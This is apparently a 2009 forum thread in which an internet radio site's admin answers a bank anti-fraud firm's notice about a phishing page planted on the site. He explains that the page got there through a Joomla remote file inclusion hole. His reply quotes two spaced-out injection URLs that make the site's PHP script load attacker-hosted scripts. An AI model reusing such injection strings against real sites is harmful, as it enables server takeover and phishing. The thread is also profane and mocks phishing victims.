Script-Kiddies, CitiBank and other over the top bs.

[VAXman(Admin)]

This past weekend was yet another episode of script-kiddies playing games on the AM web site. However, with a twist... Jim received the following email which he forwarded to me:

Dear Sir or Madam:

Cyveillance, an anti-fraud and security company, is under contract to assist
Citibank and its related entities in preventing or terminating online
activity that targets Citibank's clients as potential fraud victims.. Cyveillance
has been made aware that you appear to be providing Internet Services to a
fraudulent Web site being used as part of a "phishing scam". This activity
violates Citibank copyright, trademark and other intellectual property rights
and may violate the criminal laws of the United States and other nations.

E-mail messages have been broadly distributed to individuals by a person or
entity pretending to be Citibank Bank. These e-mails use Citibank name and
identity (including trademarks) without authorization did not originate from
Citibank and this site is not an authorized Citibank site. The e-mails
request recipients to verify and submit sensitive details related to their
Citibank accounts. Within the fraudulent e-mail message, there is a link
that leads the recipients to a fraudulent website which is being hosted by
your company. The fraudulent website not only represents a misuse of
Citibank intellectual property; its purpose is designed to improperly obtain
personal information of Citibank customers in order to fraudulently access
their bank accounts. Contained in the email is an embedded URL:

URL: http://www.auralmoon.com/components/...ogon/index.htm
IP Address: 24.187.213.30
Case: [CY-2995-20090221-15109]

We understand that you may not be aware of this improper use of your
services and we appreciate your cooperation. We specifically would ask that
you also take the following actions directly to Citibank:

Please take all necessary steps to immediately shut down the fraudulent
website, terminate its availability to the Internet and discontinue the
transmission of any e-mails associated with this website.

In the event that you do not comply with the above, Citibank and its related
entities reserve all rights to take any action now or at any point in the
future.

PLEASE PROVIDE CITIBANK WITH THE FOLLOWING INFORMATION/DATA IF AVAILABLE:
- Content of the Phishing site and any available Logs (Access, FTP, Mail, and Web)
- Any customer data that has been captured and/or stored on your systems or equipment
- Any records you maintain that indicate the name, contact information,
method of payment or similar information that may be useful in helping learn
about the identity and location of the customer for whom the website has
been operated.

Please send the above information to the following Citibank contacts:
Vishant Patel - [email protected] - (212) 657-2416
David Sun - [email protected] - (212) 657-3736
Tony Melone - [email protected] - (212) 657-4942

Thank you for your cooperation to prevent and terminate this fraudulent
activity.

Sincerely,

Cyveillance Security Operations Center (CSOC)
Cyveillance, Inc.
http://www.cyveillance.com/
Email: [email protected]
Toll Free: +1 (866) 553-0646
Direct: +1 (703) 351-2400

Citi Security and Investigative Service
Name: John Pignataro
Address: 111 Wall St, 19th Floor/Zone 7, New York, 10005
Tel: 212-657-0721
Email: [email protected]

======== ANALYST NOTES ========
It looks like a hacker has attached a fake bank page (a.k.a.
"phish") onto Aural Moon's Website. Please take a look and
do what you can to remove the bad files. Thank you in
advance for helping to protect our client and its customers
from bank fraud and identity theft. You may also want to
install any patches that would be needed to protect your
site in the future.

[CY-2995-20090221-15109]

I will not be threatened or intimidated by assholes and told that I must take the web site down to protect their assets. If people using on-line banking are STUPID enough to fall for the shit perpetrated by these script-kiddies, it is NOT my fault, Jim's or Aural Moon's. Albert Einstein once said, "Two things are infinite: the universe and human stupidity; and I'm not sure about the universe."

Over the top or not, my response is below:

To whom this may concern:

I was forwarded a message, the content of which is below, concerning the
Aural Moon web site and a "phishing" scam.

I want to first address the tone of this message. I find it very wrong,
unprofessional, accusatory and arrogant. Had Mr. Brennan not forwarded
it to me, I would have simply disregarded it. You should reprimand and
or fire the faineant dolt that composed this text as it's certainly NOT
worthy of my time to read, let alone address. If Cy-veillance has been
hired by CitiBank, their shareholders should be made aware of the lack
of Cy-veillance's fiduciary duty to address this issue with the proper
diligence it should have been afforded.

FWIW, I have been aware of the Aural Moon web site being exploited by a
script-kiddie or two in the past. Over the past few days, there has
been some further activity. However, I have not been able to address
this as I have been preoccupied over the past two months with the death
of a 95 year old grandmother, and the month long hospitalization and the
death (on Friday) of my mother-in-law. Yesterday, while I was attending
my grand daughter's christening and after party, this "shit hit the
fan". I did as much as I could at the party with my laptop and EVDO
internet connection. I finally had to cut my attendance at the party
short to head home to address this attack. I'm now wasting my time
addressing this email to you when I should be getting ready for the
viewing and the funeral of the mother-in-law.

Aural Moon is an internet radio station and web site. It is a hobby for
all those involved. It has been put together by a number of people that
were concerned in making a community and not as well focused on internet
security as they probably should have been. It's an internet radio site
and it was not considered to be all that interesting to the malevolence
of the internet no-good-nicks.

That said, I did find, after cleaning up quite the mess that the puerile
script-kiddies left (until well after 2am in the morning), interesting
clues as to the whys and wherefores of how the site was exploited. The
site is using Joomla as its CMS. The script-kitties used a hole in one
of the Joomla common files (which I have, now that I understand what and
how, closed) to execute their own scripts on OTHER servers. Here are 2
of the URLs that they used to execute/inject their code:

http: //www. auralmoon. com //playlist .php /db .php? commonpath=
http: //emmanuel. aubert. free. fr/ gunjibaba .txt???

http: //www. auralmoon. com //playlist .php /db .php? commonpath=
http: //offed. net /media /Shaun$ .txt?


I broke these URL apart so that you can read them. Since you morons are
in the banking business on Wall Street, I assume you are using crap like
Micro$oft WEENDOZE to read this email.

If these hapless Cy-veillance sots are worth the salt, they will check
out the text of the scripts at free.fr and offed.net and see what these
little pricks were up to.

One last thing, I have the emails, albeit they are disposable Yahoo
email addys, for you of these script-kiddies. Maybe Yahoo can lend you
a hand in tracking them down. Make certain to address Yahoo with the
very same adamant verbiage used in the email forwarded to me by Mr.
Brennan for the quickest resolution.

[email protected] and [email protected]


PS. For Cy-veillance... if you're going to use Whois technical contact
information to contact me, like you did with the myriad phone calls I
have logged this past weekend, you should leave a voice mail message! I
pay good money to have a voice mail service, so bloody fucking use it!

[NorCalKurt]

Yeah, what he said. Thank you Vax.

[cfrans]

Vax- 1st off, I would like to offer my warmest sympathy on your recent family deaths. After losing my 84 yr old Dad 4 mths ago to 5 yr battle with prostrate cancer, I share in your pain.

2nd I hope that this will blow over with not to much time resolving this f'in mess.. Good Luck

[eloy1964]

My thoughts and sympathies go out to you vax my friend. Just don't let the bastards get you down. As far as the response to the letter, ouch! glad not to be on the receiving end of that one, but well said.

[VAXman(Admin)]

Though your sympathies are welcome, they were not necessary. The mention of the current family deaths was meant to put things into perspective for these idiots. As the idiom goes, I do not suffer fools gladly.

US code, 47 section 230(c)(1) provides immunity from the actions caused by these script kiddies:

No provider or user of an interactive computer service shall be treated as the publisher or speaker of any information provided by another information content provider.

These Cy-veillance folks claim to be in the cyber-security business and should be aware of this law. To threaten legal action or imply that CitiBank would or could take any legal action was inappropriate.

[AngelSings4u2]

Excellent Vax, not at all over the top! Thank you for always doing such a great job for Aural Moon!!! And very, very sorry to hear about Martha's mom....

Love to you both, Angel

[VAXman(Admin)]

Quote:

Originally Posted by AngelSings4u2

Excellent Vax, not at all over the top! Thank you for always doing such a great job for Aural Moon!!! And very, very sorry to hear about Martha's mom....

Love to you both, Angel

First, to set things straight, this was not Martha's mom. Martha's mom passed on 10 years ago. Martha's father remarried about 3 years after her mother passed. I didn't think that these sordid details were important for and would probably confuse these schmuck == Security Company Having Moronic Unbelievably Clueless Kooks.

[PeterG]

VAX, i wonder if the script kiddies think that if they hack the site they are going to find Gigs 'o Gigs of music?

I'll bet that they do not know that the music is not stored here.


Peter

[VAXman(Admin)]

Quote:

Originally Posted by PeterG

VAX, i wonder if the script kiddies think that if they hack the site they are going to find Gigs 'o Gigs of music?

I'll bet that they do not know that the music is not stored here.


Peter

They're not looking for music; they're looking to use the web site as a rogue outpost to do their dirty deeds. Exploiting a hole in one of the Joomla PHP scripts (which I have now closed), they were able to have the AM web site run their own scripts located on OTHER servers. Of course, we get the fingers pointed at us when this occurs.

FWIW, there has been very little activity on the AM server (and my router's flashing LEDs prove that out) other than what there should be since I plugged this hole and one other I found doing some googling.

[jtmckinley]

Hey VAX, sorry to hear of all the shite you're dealing with due to these pinheads. Have you made a complaint to the feds yet? Not that I'd expect much action from them, but what the hell many of us are US tax payers, they work for us, this is clearly harassment, fraud, extortion, cyber-terrorism and prolly 20 other violations. Wait, that's the ticket, call it terrorism that might elicit some action right? No? Oh well. Anyway, if you haven't, I'd report it, just in the off chance that they might be caught and one or more of them would find a new 7 ft. tall boyfriend in some penitentiary. Stranger things have happened...

[woodchuckvt]

Give 'em hell VAX.

One day soon us taxpayers will own Citibank and we can add government oversight to this wreckage of a company. A bright future awaits us all. I can't wait for my stockholder bonus check.

[VAXman(Admin)]

Quote:

Originally Posted by jtmckinley

Hey VAX, sorry to hear of all the shite you're dealing with due to these pinheads. Have you made a complaint to the feds yet? Not that I'd expect much action from them, but what the hell many of us are US tax payers, they work for us, this is clearly harassment, fraud, extortion, cyber-terrorism and prolly 20 other violations. Wait, that's the ticket, call it terrorism that might elicit some action right? No? Oh well. Anyway, if you haven't, I'd report it, just in the off chance that they might be caught and one or more of them would find a new 7 ft. tall boyfriend in some penitentiary. Stranger things have happened...

You forget, I once worked under contract to the DoD in an R&D lab. The only people around me with an IQ were under contract. There's good reason they're called simple-servants.

I have no faith in my gov't... not anymore and even less with the $787B/bbl snake oil spending spree they've gone on. To add insult to the injury, you have attorneys prosecuting and defending people for cyber-crimes and they themselves don't know how to use a computer. The stench of gov't hipocricy and stupidity fills the air like a newly manure fecundated field.

[VAXman(Admin)]

Quote:

Originally Posted by woodchuckvt

Give 'em hell VAX.

One day soon us taxpayers will own Citibank and we can add government oversight to this wreckage of a company. A bright future awaits us all. I can't wait for my stockholder bonus check.

Sorry, woochuck, they're spending your dividend on lavish parties in Las Vegas with golf outings, Tiffany gifts in Berberry bags, private concerts, Chateaubriand, Beluga caviar, Dom Perignon, and call-girls.

Careful VAX............remember Canvas.

[woodchuckvt]

Vax,

I've already borrowed on and leveraged my Citibank taxpayer bonus check with a high yield Antiguan CD. Talk about high finance

Dang, is that a tongue stuck in that cheek ?

[museman]

what a pain